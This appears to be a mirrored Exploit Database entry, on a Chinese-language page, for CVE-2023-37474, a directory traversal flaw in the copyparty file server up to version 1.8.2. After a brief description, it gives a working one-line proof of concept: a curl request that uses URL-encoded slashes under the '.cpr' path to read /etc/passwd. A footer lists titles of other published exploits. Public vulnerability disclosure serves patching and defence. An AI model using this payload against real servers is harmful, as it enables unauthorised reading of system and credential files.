copyparty 1.8.2 – Directory Traversal

Exploit Database
107 阅读

作者： Vartamtezidis Theodoros

日期： 2023-07-28
类别：
- webapps
平台：
- Python
来源：https://www.exploit-db.com/exploits/51636/

# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474




#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -XGET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

last Exploits
copyparty 1.8.2 – Directory Traversal的更多信息

ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE：
Student Management System 1.0 – ‘message’ Persistent Cross-Site Scripting (Authenticated)：
ManageEngine DeviceExpert 5.9 – User Credential Disclosure：
SuperMicro IPMI 03.40 – Cross-Site Request Forgery (Add Admin)：
CRESUS – ‘recette_detail.php’ SQL Injection：
Argus Surveillance DVR 4.0.0.0 – Directory Traversal：
WordPress Plugin Z-Vote 1.1 – SQL Injection：
PHPDug 2.0.0 – Cross-Site Scripting：